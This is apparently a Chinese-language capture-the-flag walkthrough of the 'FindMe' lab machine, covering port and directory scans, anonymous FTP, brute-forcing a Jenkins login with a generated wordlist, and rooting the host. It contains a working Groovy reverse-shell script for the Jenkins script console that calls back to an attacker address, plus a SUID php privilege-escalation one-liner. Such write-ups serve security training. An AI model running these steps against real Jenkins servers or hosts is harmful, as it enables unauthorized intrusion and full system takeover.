FindMe

image

信息搜集

192.168.43.142

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# rustscan -a 192.168.43.142 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.43.142:21
Open 192.168.43.142:22
Open 192.168.43.142:80
Open 192.168.43.142:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.43.142
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-18 19:33 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
Initiating ARP Ping Scan at 19:33
Scanning 192.168.43.142 [1 port]
Completed ARP Ping Scan at 19:33, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:33
Completed Parallel DNS resolution of 1 host. at 19:33, 0.50s elapsed
DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:33
Scanning 192.168.43.142 [4 ports]
Discovered open port 80/tcp on 192.168.43.142
Discovered open port 21/tcp on 192.168.43.142
Discovered open port 22/tcp on 192.168.43.142
Discovered open port 8080/tcp on 192.168.43.142
Completed SYN Stealth Scan at 19:33, 0.01s elapsed (4 total ports)
Initiating Service scan at 19:33
Scanning 4 services on 192.168.43.142
Completed Service scan at 19:33, 28.54s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.43.142
NSE: Script scanning 192.168.43.142.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:33
NSE: [ftp-bounce 192.168.43.142:21] PORT response: 500 Orden PORT ilegal
Completed NSE at 19:33, 0.74s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.58s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
Nmap scan report for 192.168.43.142
Host is up, received arp-response (0.00053s latency).
Scanned at 2026-05-18 19:33:26 CST for 31s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 206 Jun 6 2024 ayuda.txt
| fingerprint-strings:
| GenericLines:
| 220 Servidor ProFTPD (Debian) [::ffff:192.168.43.142]
| Orden incorrecta: Intenta ser m
| creativo
| Orden incorrecta: Intenta ser m
| creativo
| Help:
| 220 Servidor ProFTPD (Debian) [::ffff:192.168.43.142]
| 214-Se reconocen las siguiente
| rdenes (* =>'s no implementadas):
| XCWD CDUP XCUP SMNT* QUIT PORT PASV
| EPRT EPSV ALLO RNFR RNTO DELE MDTM RMD
| XRMD MKD XMKD PWD XPWD SIZE SYST HELP
| NOOP FEAT OPTS HOST CLNT AUTH* CCC* CONF*
| ENC* MIC* PBSZ* PROT* TYPE STRU MODE RETR
| STOR STOU APPE REST ABOR RANG USER PASS
| ACCT* REIN* LIST NLST STAT SITE MLSD MLST
| comentario a root@find-me
| NULL, SMBProgNeg, SSLSessionReq:
|_ 220 Servidor ProFTPD (Debian) [::ffff:192.168.43.142]
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a7:98:b6:44:36:c9:55:c6:06:f6:0b:5e:a2:ab:4f:28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIgi5ANabhXAOGVpA2hYQ9htq4dY8z+2pp7HkD8b4+iAboG2n4wFOYYo/LbPt1d5A479eoHemz+N0/wOZN9eCak=
| 256 fa:bf:4f:e3:ea:ad:80:e7:99:3d:eb:44:8b:f5:58:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMBez5GUfybmysiaMkRqcx2bgGJdUvGUiS3uX2ll8FYm
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open http syn-ack ttl 64 Jetty 10.0.20
|_http-server-header: Jetty(10.0.20)
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.99%I=7%D=5/18%Time=6A0AF90C%P=x86_64-pc-linux-gnu%r(NULL
SF:,37,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.43\
SF:.142\]\r\n")%r(GenericLines,99,"220\x20Servidor\x20ProFTPD\x20\(Debian\
SF:)\x20\[::ffff:192\.168\.43\.142\]\r\n500\x20Orden\x20incorrecta:\x20Int
SF:enta\x20ser\x20m\xc3\xa1s\x20creativo\r\n500\x20Orden\x20incorrecta:\x2
SF:0Intenta\x20ser\x20m\xc3\xa1s\x20creativo\r\n")%r(Help,276,"220\x20Serv
SF:idor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.43\.142\]\r\n214-Se
SF:\x20reconocen\x20las\x20siguiente\x20\xc3\xb3rdenes\x20\(\*\x20=>'s\x20
SF:no\x20implementadas\):\r\n\x20CWD\x20\x20\x20\x20\x20XCWD\x20\x20\x20\x
SF:20CDUP\x20\x20\x20\x20XCUP\x20\x20\x20\x20SMNT\*\x20\x20\x20QUIT\x20\x2
SF:0\x20\x20PORT\x20\x20\x20\x20PASV\x20\x20\x20\x20\r\n\x20EPRT\x20\x20\x
SF:20\x20EPSV\x20\x20\x20\x20ALLO\x20\x20\x20\x20RNFR\x20\x20\x20\x20RNTO\
SF:x20\x20\x20\x20DELE\x20\x20\x20\x20MDTM\x20\x20\x20\x20RMD\x20\x20\x20\
SF:x20\x20\r\n\x20XRMD\x20\x20\x20\x20MKD\x20\x20\x20\x20\x20XMKD\x20\x20\
SF:x20\x20PWD\x20\x20\x20\x20\x20XPWD\x20\x20\x20\x20SIZE\x20\x20\x20\x20S
SF:YST\x20\x20\x20\x20HELP\x20\x20\x20\x20\r\n\x20NOOP\x20\x20\x20\x20FEAT
SF:\x20\x20\x20\x20OPTS\x20\x20\x20\x20HOST\x20\x20\x20\x20CLNT\x20\x20\x2
SF:0\x20AUTH\*\x20\x20\x20CCC\*\x20\x20\x20\x20CONF\*\x20\x20\x20\r\n\x20E
SF:NC\*\x20\x20\x20\x20MIC\*\x20\x20\x20\x20PBSZ\*\x20\x20\x20PROT\*\x20\x
SF:20\x20TYPE\x20\x20\x20\x20STRU\x20\x20\x20\x20MODE\x20\x20\x20\x20RETR\
SF:x20\x20\x20\x20\r\n\x20STOR\x20\x20\x20\x20STOU\x20\x20\x20\x20APPE\x20
SF:\x20\x20\x20REST\x20\x20\x20\x20ABOR\x20\x20\x20\x20RANG\x20\x20\x20\x2
SF:0USER\x20\x20\x20\x20PASS\x20\x20\x20\x20\r\n\x20ACCT\*\x20\x20\x20REIN
SF:\*\x20\x20\x20LIST\x20\x20\x20\x20NLST\x20\x20\x20\x20STAT\x20\x20\x20\
SF:x20SITE\x20\x20\x20\x20MLSD\x20\x20\x20\x20MLST\x20\x20\x20\x20\r\n214\
SF:x20Env\xc3\xada\x20comentario\x20a\x20root@find-me\r\n")%r(SSLSessionRe
SF:q,37,"220\x20Servidor\x20ProFTPD\x20\(Debian\)\x20\[::ffff:192\.168\.43
SF:\.142\]\r\n")%r(SMBProgNeg,37,"220\x20Servidor\x20ProFTPD\x20\(Debian\)
SF:\x20\[::ffff:192\.168\.43\.142\]\r\n");
MAC Address: 08:00:27:59:E1:2B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=5/18%OT=21%CT=%CU=31930%PV=Y%DS=1%DC=D%G=N%M=080027%TM
OS:=6A0AF925%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Uptime guess: 32.864 days (since Wed Apr 15 22:50:06 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: Servidor; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.43.142

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:33
Completed NSE at 19:33, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.96 seconds
Raw packets sent: 27 (1.982KB) | Rcvd: 19 (1.454KB)
  • 21 FTP
  • 22 SSH
  • 80 HTTP
  • 8080 HTTP

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿Eecho)-[/tmp/bbbb]
└─# gobuster dir -u http://192.168.43.142/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,back,cgi,jpg,json,md
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.43.142/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: back,cgi,jpg,json,md,php,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 10701]
server-status (Status: 403) [Size: 279]

ftp枚举

前面rustscan扫描的时候已经扫描出ftp存在匿名登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root㉿Eecho)-[~]
└─# ftp 192.168.43.142
Connected to 192.168.43.142.
220 Servidor ProFTPD (Debian) [::ffff:192.168.43.142]
Name (192.168.43.142:root): anonymous
331 Conexión anónima ok, envía tu dirección de email como contraseña
Password:
230 Aceptado acceso anónimo, aplicadas restricciones
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||9926|)
150 Abriendo conexión de datos en modo ASCII para file list
-rw-r--r-- 1 0 0 206 Jun 6 2024 ayuda.txt
226 Transferencia completada
ftp> get ayuda.txt
local: ayuda.txt remote: ayuda.txt
229 Entering Extended Passive Mode (|||26267|)
150 Opening BINARY mode data connection for ayuda.txt (206 bytes)
100% |***********************************************************************************************************************************************| 206 299.36 KiB/s 00:00 ETA
226 Transferencia completada
206 bytes received in 00:00 (57.06 KiB/s)
ftp> ^D
221 Hasta luego
┌──(root㉿Eecho)-[~]
└─# cat ayuda.txt
hola soy geralt
he perdido mi contraseña del servicio jenkins
me han dicho que tu sabes de fuerza bruta
la contraseña contiene 5 caracteres
empieza por p y acaba en a
no recuerdo nada mas
muchas gracias

ayuda.txt提示了Jenkins 服务的密码有5个字符,且开头是p,结尾是a。编写python脚本生成密码字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import itertools
import string

def generate_jenkins_dict(output_file="jenkins_dict.txt"):
# 1. 定义已知和未知的结构
prefix = "p"
suffix = "a"

# 2. 定义中间 3 位字符的取值范围
# 如果确定只是小写字母,用 string.ascii_lowercase
# 如果可能包含数字,可以改为: string.ascii_lowercase + string.digits
charset = string.ascii_lowercase

print(f"[*] 正在生成字典,字符集范围: {charset}")

count = 0
with open(output_file, "w", encoding="utf-8") as f:
# itertools.product 会自动生成 3 位字符的所有排列组合(等同于 3 层嵌套循环)
for middle_chars in itertools.product(charset, repeat=3):
# 将元组拼成字符串,例如 ('b', 'c', 'd') -> "bcd"
middle_str = "".join(middle_chars)

# 组合成完整的 5 位密码
password = f"{prefix}{middle_str}{suffix}"

# 写入文件并换行
f.write(password + "\n")
count += 1

print(f"[+] 字典生成成功!共生成 {count} 个密码,已保存至: {output_file}")

if __name__ == "__main__":
generate_jenkins_dict()

burpsuite爆破密码,这里用户名是geralt,ayuda.txt里面提到过

image

image

经过查找官方文档知道有一个脚本控制台/script

https://www.jenkins.io/doc/book/managing/script-console/

支持Groovy语言

image

访问/script执行反弹shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
String host="192.168.43.6";
int port=7777;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e){}
};
p.destroy();
s.close();

image

提权

jenkins -> root

查找suid文件

1
2
3
4
5
6
7
8
9
10
11
12
13
jenkins@find-me:/$ find / -perm -4000  2>/dev/null
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/php8.2
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

有个php8.2可以利用php进行提权到root

在gtfbins上有现成方案https://gtfobins.org/gtfobins/php/

1
2
3
4
jenkins@find-me:~$ /usr/bin/php8.2 -r 'posix_setuid(0); system("/bin/bash -i");'
root@find-me:~# id
uid=0(root) gid=110(jenkins) grupos=110(jenkins)
root@find-me:~#